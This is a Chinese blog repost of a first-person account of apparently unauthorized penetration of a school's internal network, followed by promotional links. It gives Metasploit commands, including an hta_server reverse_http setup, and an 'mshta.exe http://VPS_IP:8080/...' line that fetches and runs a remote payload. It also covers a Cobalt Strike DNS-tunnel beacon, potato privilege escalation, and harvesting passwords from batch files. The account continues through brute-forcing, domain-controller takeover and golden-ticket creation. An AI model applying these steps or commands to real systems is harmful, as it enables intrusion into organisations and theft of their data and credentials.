点击上方的终端研发部,右上角选择“设为星标

作者:i春秋作家
原文:https://bbs.ichunqiu.com/thread-58227-1-1.html

一 、 前言

近期一直再学习内网渗透,实验什么的都是玩玩靶机。

这一天朋友说有个站点有漏洞,就发过来看了一些是一个SQL注入,继而开启了这次内网渗透。水平有限,并且初学哈哈哈哈!没有什么技术要点纯属误打误撞,如果有什么错误的地方希望大佬多多指点!

二 、 WEB点进入内网

这次渗透是从站库分离的情况下在深入进去内网在拿下域控服务器,也都是普通的渗透思路,并没有什么技术含量!

首先WEB点是一个MSSQL注入漏洞,并且这个注入是sa权限的!

首先这个站点是使用JoomlaCMS搭建的,但是在一处Study信息登记处发现了SQL注入漏洞

接着抓下此处查询的数据包进行注入,并且或者了是高权限,可以开启xp_cmdshell来进行进一步的提权。

在注入的返回的指纹信息可以获知对方的操作系统大概率就是windows Server 2012系统

那么接下来不用想就是直接提权到MSF上面了,这里使用hta来提权到MSF

msf5 > use exploit/windows/misc/hta_servermsf5 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_httppayload => windows/meterpreter/reverse_httpmsf5 exploit(windows/misc/hta_server) > set lhost VPS_IPlhost =>  VPS_IP

这里就开始监听断开,然后需要在对方哪里执行命令。

如下

接着在执行 mshta.exe http://VPS_IP:8080/IAKWSlu.hta

执行之后对方直接上线MSF了,这里可以看到对方的主机名称就叫DATABASE.

看似一切顺利,但是往往都不会如自己想的那样,上线之后一直不能执行命令,都返回超时。在VPS的流量过去应该也不会有多大的阻碍啊!

也许是被对方的一些设备拦截了吧!

既然MSF不能操作的话,SQLMAP提供的shell也不是很好操作,那么可以试着写入webshell进入到对方主机上面。

但是我查找了一番并无WEB路径,这里时候想起了它的主机名称,会不会是一个站库分离的网站。

对于MSSQL注入查询是否站库分离很简单

select @@servernameselect host_name()

果不其然这里的确就是站库分离。

既然是MSF的流量比较明显,也不能写入webshell,那么我现在就希望能让其上线CobaltStrike吧!

经过一番测试发现HTTP流量也是返回不了Beacon那么我就使用DNS隧道来上线。

首先需要配置域名解析到CS的服务器上面,并且执行NS记录。这里就略过过程了。

首先生成DNS隧道监听。主机这里填写A记录

接着会弹出来要给框,这里需要填写的就是填写域名解析的NS记录了!

接着使用powershell来让其上线,但是发现在SQLMAP的shell中这里显示无法使用powershell。

这里可能是用户的原因吧!这里的用户是mssql用户

如果不能使用Powershell上线,那么可以使用CS的hta文件上线。

利用CS生成hta文件然后挂到CS服务器上面,接着在shell中顺利执行,并且CS上线小黑框!看来上线有望了!

使用tcpdump监听53端口的流量,可以看到这里目标已经开始连接CS服务器了!


上线之后,使用ipconfig /all查看当前IP。

发现DNS这里存在域名,这里初步推测是存在域环境的。

并且当前的主机在10段的网段中。在往下看可以看到DNS服务器由两个IP地址。

这里初步推断这就是域控了!

因为一般安装域控的话都会安装DNS服务器,并且解析到域控上面!

接着使用systeminfo来查看主机的信息。可以看到系统是windows2012的系统,并且可以确定的是由域环境。

并且但是打的补丁很多,当前的权限是mssql权限,必须提权才能进行下一步渗透!

试ping一下DNS的主机名称。

是可以ping的通的完全没有问题,如果不同的话也不应该哈哈哈!!

可以看到DNS的IP地址为10.10.10.2。

如果这个域不大的话那么应该可能这个就是域控了!但是奇怪的就是有的时候也会出现10.10.10.4!

还有就是!当我访问www的域名的时候,它会给我转跳到web的域名上面去。

所以我怀疑10.10.10.1这台主机并不是真正的提供WEB的服务器!

也就是不是JoomlaCMS这个WEB的服务器

接着对内网的机器进行探测,这里可以使用K8gege的龙珠插件,对这个网段进行探测。最后在进行判断。

这个域是由三个DNS服务器的!

并且从探测信息返回的主机名称看,这三个DNS服务器就是域控了!

并且WEB服务器就是10.10.10.1这台服务器,因为在先前判断站库分离的时候已经知道WEB服务器的名称了!

接下来就开始提权了!这里可以利用systeminfo输入的补丁信息复制到提权辅助页面上面进行补丁比对

https://bugs.hacking8.com/tiquan/

也可也利用MSF上面的post模块上的本地提权插件来进行获取提权漏洞信息。

这里我把会话传递到MSF上,并且使用本地提权查询模块

msf5 exploit(windows/misc/hta_server) > use post/multi/recon/local_exploit_suggestermsf5 post(multi/recon/local_exploit_suggester) > set session 1msf5 post(multi/recon/local_exploit_suggester) > run

这里MSF返回信息说可以利用ms16-075。话不多说直接提权开搞!

利用CS的本地提权插件里面的potato提权漏洞进行提取成功。

提取到了system权限本来是可以获取对方的哈希的,因为是windows 2012的操作系统这里无法获取明文。

但是这台机器开启了LSA保护吧!连mimikatz都不能执行了,返回5结尾的报错!

所以我直接创建一个用户用于等下连接3389

接下来可以利用代理进入对方的内网,我测试了一下CS自带的socks代理并不是很好,有的时候会卡住。

这里我选择上传iox来进行代理

进入内网之后直接开搞!首先可以对内网的永恒之蓝的机器进行扫描。

成功扫描除了10.10.10.41和10.10.10.37这两台机器是存在永恒之蓝漏洞的!

这里我直接打10.10.10.41,它的操作系统是windows 7 。10.10.10.37是windows 2003的系统先不搞!

MSF给我连续打了好几波!但是都没有成功!这里应该是失败了!

对端设备有防火墙或者杀软的软件拦截了吧。

三、 失去权限!重新再次进入内网

这个时候已经是晚上四点钟了,肝不下去了直接睡觉!谁知道第二天一起来CS的Beacon已经掉线,并且还上线不了了!!!!

可能管理员已经发现并且加固了服务器了!

如果对方没有把我的VPS禁止的话那还行可以继续进行渗透的!

首先再VPS上面进行icmp流量!

然后在目标Ping服务器,发现流量是可以通的

上次上传的iox已经被管理员给删除了,接下来的话需要在下载过去。

接着测试HTTP流量也是完全可以的。两端可以通讯HTTP流量

那么就可以通过VPS开启HTTP服务下载软件到对方的服务器上面

这里我不选择iox来进行代理了,应为我现在已经失去了一个CS的稳定控制,这里我选择VENOM这个代理工具,这个代理工具在代理成功之后可以使用shell命令获取一个CMD的shell。

这里就可以免去SQLMAP那个shell了!!

接着代理进去之后本来想用之前创建的账号进行登陆的,但是当时没有创建隐藏用户,登陆不上去了。

这个时候我对这台数据库进行信息收集,既然是数据库服务器,那么敏感的信息一定有。可以使用如下命令进行

dir /s /b .txtdir /s /b .batdir /s /b *.xml

这里我在C盘的目录下惊喜的发现,这有敏感的批处理文件,名字大概的意思就是备份数据库。

这里我查看里面的信息。

发现里面是对其他服务器进行连接的批处理,并且还有账号名和密码。

真的是太幸运了!这个时候想起一句话:渗透成功的几率是和对方管理员的水平成正比的!!!!

这个时候我顿时兴奋了起来!既然管理员通过这样来进行备份,那么他很多管理机器应该都是相同的密码。

接着我整理一下用户名和密码字典。

在代理的情况下对其内网的机器开始爆破破解。爆破出来之后发现域控服务器都在里面!!

管理员为了方便管理运维服务器!很多服务器的密码都一样,这里我直接登陆进去10.10.10.5这台数据库服务器看看为啥不能上线了!

进去之后才发现是这个eset。怪不得我上线不了,原来是这个东西在作怪!

10.10.10.5这台机器就是数据库,里面由存放除了网站的数据信息之外,还有一些学校里面的一些文档信息。

这台服务器其实就是上次的文档文件之类的都是上传到这里

接着登陆到10.10.10.1这台服务器看看!因为这台服务器是解析www的,并且查询学生信息的域名也是www的,那么肯定10.10.10.1是连接MSSQL的。

并且进入到WEB目录下次。

的确这里会转跳到web域名哪里


接着在这台服务器里面发现了MSSQL数据库的连接文件,并且发现了密码

接着使用龙珠的插件进行web扫描,发现了他的JoomlaCMS的IP地址就是10.10.10.45和10.10.10.202

然后访问之,发现它的网站是使用xampp搭建的网站,然后再它的配置文件找到了它的数据库连接文件。

这里他也是有phpmyadmin的,如果是内网访问的话是无密码就可以访问,外网是不能访问的!

接着查看这台机器的arp表项,发现这台机器有对10.10.11.0/24网段的主机进行通信,好家伙!

立刻对这个网段进行探测,然后登陆进来了一台10.10.11.6这台主机。是一台档案机器。

但是10.10.11.0/24这个网段很少机器!有几台tp-link。

还有的大多数都是虚拟机。接着登陆到域控制器上面,这里域控分为三个域控!最后查看了一下发现这个域存在的主机挺多的!

这里可以直接管理这些主机了

最后把域控的hash dump下来制作了黄金票据,但是都不能pth了!

看了一下报错大部分显示有防火墙拦截之类的!

但是奇怪的是我再内网翻了一下发现了一处有意思的东西,就是某大佬之前入侵没有抹干净的文本文件。

这里是mimikatz的内网,时间是距离现在的2个月前的3月份哈哈哈哈哈!可能管理员再大佬渗透之后做了加固吧!

回复 【idea激活】即可获得idea的激活方式

回复 【Java】获取java相关的视频教程和资料

回复 【SpringCloud】获取SpringCloud相关多的学习资料

回复 【python】获取全套0基础Python知识手册

回复 【2020】获取2020java相关面试题教程

回复 【加群】即可加入终端研发部相关的技术交流群

最近于哥也在玩视频号啦,主要针对于程序员方向的,大家可以去关注一波:

最近面试Java后端开发的感受

互联网的圈子,游戏行业的现状是如何?

动画:一招学会TCP的三次握手和四次挥手

干掉PostMan!IDEA这款插件太实用了…

美团面试题:Java-线程池 ThreadPool 专题详解

当去阿里面试 Java 都是问什么?

27个阿里 Java 开源项目,值得收藏!

相信自己,没有做不到的,只有想不到的

在这里获得的不仅仅是技术!

喜欢就给个“在看

记录一次SQL引起的内网渗透​相关推荐

  1. vulnhub_内网渗透测试的记录——网络安全

    主要考察知识点 文件包含内网穿透命令上传弱口令更改权限HTTP协议HeaderElasticSearch-CVE暴力破解 网络拓扑 写完之后把靶机的网络拓扑也做了一下 写在之前 这次用的虚拟机是VM_ ...

  2. 记录阿里云 centOS FRP 树莓派 内网穿透

    记录阿里云 centOS FRP 树莓派 内网穿透 我们知道windows上有一些穿透工具,花生壳向日葵这样的最近几年比较热门,几乎成了新的装机必备.我有一点嵌入式功底,在人工智能的背景下,除了嵌入式 ...

  3. 记一次MSF综合应用内网渗透记录

    0x01 前言 随机找的个台湾某越科技集团下的站点作为此次测试目标,只是为了学习下内网渗透和MSF的使用.13年9月份时拿到了一个子域的Webshell权限后就没再继续测试了,当时服务器没有安装Sym ...

  4. 内网渗透系列:横向渗透方法小结

    目录 前言 一.端口渗透 1.常见默认端口 (1)web类(web漏洞/敏感目录) (2)数据库类(扫描弱口令) (3)特殊服务类(未授权/命令执行类/漏洞) (4)常用端口类(扫描弱口令/端口爆破) ...

  5. 红蓝对抗之Windows内网渗透

    无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平.企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑.外网服务.职场WiFi等方式进入内网,然后发 ...

  6. vulnstack内网渗透环境靶场-1 大全

    一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack ...

  7. 1.我所了解的内网渗透

    最近看了一点内网渗透的学习资料,感觉内网渗透需要的知识太多,遂写博客来记录下自己学习内网渗透的一些笔记. 开篇首先推荐i春秋陈小兵老师在技术沙龙上的分享:https://www.ichunqiu.co ...

  8. 内网渗透-内网信息搜集

    前言 当我们能访问到⽬标内⽹任何资源之后,我们就可以对 ⽬标内⽹进⾏更深层次的信息搜集⽐如:主机收集.IP 段搜集.端⼝开放服务.Web 资产数量.漏洞类型.接下来是一些工具的食用姿势,仅供参考. 假 ...

  9. 内网渗透-Windows内网渗透

    内网渗透-Windows内网渗透 文章目录 内网渗透-Windows内网渗透 前言 一.信息收集 1.1.SPN 1.2.端口连接 1.3.配置文件 1.4.用户信息 1.6.会话收集 1.7.凭据收 ...

最新文章

  1. 【Android 高性能音频】Oboe 开发流程 ( Oboe 音频帧简介 | AudioStreamCallback 中的数据帧说明 )
  2. CSP-S初赛知识点复习(全)
  3. python时间函数详解_Python:Numpy库基础分析——详解datetime类型的处理
  4. Java中的static静态代码块
  5. Spark 入门系列-简介以及生态
  6. aotu.js 动态运行脚本_素材丨一键生成动态LOGO,3000+个样式随你选!
  7. python 赋值操作的知识点
  8. python利用Excel读取和存储测试数据完成接口自动化
  9. 手机自动化测试:appium源码分析之bootstrap五 上
  10. Python正则表达式指南下半部
  11. 分治法-求最大最小元素
  12. 2019汤家凤高等数学强化班讲义
  13. lol12.11服务器维护,LOL2018年11月13日更新维护到几点
  14. 升级 MacOS 到最新版本 macOS Ventura 13.0 后,Parallels Desktop 不可用
  15. Java中关于UTM转经纬度
  16. 运放放大倍数计算公式_模电的半壁江山——运算放大器的原理和应用
  17. 知乎1w视频播放能赚多钱?今天来大揭秘
  18. 频繁跳槽,这谁顶得住~
  19. USB协议详解第6讲(USB描述符-端点描述符)
  20. oracle3个重要角色,Oracle 用户及角色 介绍

热门文章

  1. EFM32jg之FreeRTOS(1)-移植
  2. 泛型编程、STL的概念、STL模板思想及其六大组件的关系,以及泛型编程(GP)、STL、面向对象编程(OOP)、C++之间的关系
  3. EasyUI tree 实现点击展开/折叠
  4. 计算机软件著作权在哪登记
  5. ESRI官网关于Javascript的内容(1)__获取ArcGIS API for Javascript
  6. Unable to start docker Container from docker-compose “unknown flag: iidfile”
  7. 保理业务系统-特点介绍一
  8. 人体一机竞技格斗机器人_机器人崩溃战斗格斗竞技场
  9. cadence SPB17.4 - orcad - Hanging Wires规则的验证实验
  10. 新冠后遗症的阴云与疑云